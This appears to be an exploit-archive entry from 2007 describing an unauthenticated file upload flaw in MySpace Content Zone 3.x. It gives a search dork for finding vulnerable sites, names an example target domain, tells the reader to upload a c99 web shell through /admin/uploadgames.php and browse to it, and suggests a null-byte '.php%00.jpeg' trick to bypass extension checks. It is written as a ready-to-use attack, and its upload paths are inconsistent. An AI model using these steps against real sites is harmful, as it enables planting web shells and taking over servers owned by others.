MySpace Content Zone 3.x Remote File Upload Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MySpace Content Zone 3.x Remote File Upload Vulnerability
# Published : 2007-12-18
# Author : Don
# Previous Title : FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit
# Next Title : FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit

----------------------------------------------------
[+-MySpace Content Zone RFi-+]
----------------------------------------------------
Found By Don & breaker_unit
----------------------------------------------------


Vuln file: /admin/uploadgames.php
Fix: secure admin area

Dork: "Powered by MySpace Content Zone"


go to /admin/uploadgames.php
example:
http://www.virtualdynamite.com/admin/uploadgames.php
and upload your shell - lets say it is named as c99.php

ok, now go to /uploads/thumb/c99.php
like: http://www.virtualdynamite.com/uploads/flash/c99.php

and - what you see ?? :xD
your shell!

Note1: you can add .php%00.jpeg cause %00 = null
Note2: it takes awhile to upload a shell sometimes!


Creditz to breaker_unit, h4cky0u.org and str0ke!
Don is wishing Happy Holidays to all of you reading this!
Cheers!

# www.Syue.com [2007-12-18]